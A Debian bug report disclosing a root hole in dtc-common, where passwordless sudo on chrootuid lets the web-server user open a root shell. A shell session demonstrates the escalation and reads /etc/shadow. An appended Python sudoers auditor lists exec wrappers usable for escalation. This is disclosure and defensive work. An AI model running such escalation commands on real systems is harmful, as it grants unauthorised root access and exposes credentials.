[Secure-testing-team] Bug#637618: dtc-common: giving sudo access to chrootuid is giving access to root
Mike O'Connor
stew at vireo.org
Sat Aug 13 04:56:41 UTC 2011
Package: dtc-common
Severity: critical
Tags: security
Justification: root security hole
The install script gives the dtc user (the user that is running apache)
unrestricted sudo access to chrootuid, which essentially gives root access
to the dtc account:
root at testdtc:/var/lib/dtc/etc# su - dtc
$ whoami
dtc
$ sudo chrootuid / root /bin/bash
root at testdtc:/# whoami
root
root at testdtc:/# wc -l /etc/shadow
27 /etc/shadow
root at testdtc:/# grep dtc /etc/sudoers
Defaults:dtc !set_logname
dtc ALL= NOPASSWD: /usr/bin/chrootuid *
-- System Information:
Debian Release: wheezy/sid
APT prefers unstable
APT policy: (600, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: amd64 (x86_64)
Kernel: Linux 3.0.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
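
A defensive check for the pattern this report describes, as an added example that is not part of the original report or the dtc package: it scans sudoers text for rules that let a user run an exec wrapper such as chrootuid with unconstrained arguments. The wrapper list and the `backup` rule in the sample are assumptions made for the example.

```python
import re

# Programs that run a caller-chosen command, possibly as another user.
# This list is an assumption for the example; extend it for your estate.
EXEC_WRAPPERS = {"chrootuid", "chroot", "env", "su", "nice", "xargs"}

# Constructed sample: the two sudoers lines quoted in the report, plus a
# hypothetical fixed-argument rule for contrast.
SAMPLE_SUDOERS = """\
Defaults:dtc !set_logname
dtc ALL= NOPASSWD: /usr/bin/chrootuid *
backup ALL= NOPASSWD: /usr/bin/rsync --server --sender . /srv/data
"""

# user hosts = [(runas)] [TAG:] command [, command ...]
RULE_RE = re.compile(r"^(\S+)\s+[^=]+=\s*(?:\([^)]*\)\s*)?(.+)$")
TAG_RE = re.compile(r"^([A-Z_]+):\s*")
SKIP = ("#", "Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")


def audit_sudoers(text):
    """Return (lineno, user, command, nopasswd) for each risky rule.

    Simplified parser: no alias expansion, no line continuations, and
    commas inside command arguments are not handled.
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        rule = None if not line or line.startswith(SKIP) else RULE_RE.match(line)
        if not rule:
            continue
        user, nopasswd = rule[1], False
        for cmd in rule[2].split(","):
            cmd = cmd.strip()
            # Tags such as NOPASSWD: carry over to later commands in the list.
            while (tag := TAG_RE.match(cmd)):
                nopasswd = {"NOPASSWD": True, "PASSWD": False}.get(tag[1], nopasswd)
                cmd = cmd[tag.end():]
            path, _, args = cmd.partition(" ")
            # sudo allows any arguments when none are listed; * matches arbitrary ones.
            unconstrained = not args.strip() or "*" in args
            if path.rsplit("/", 1)[-1] in EXEC_WRAPPERS and unconstrained:
                findings.append((lineno, user, cmd, nopasswd))
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print("line %d: %s may run '%s' (NOPASSWD=%s)" % finding)
```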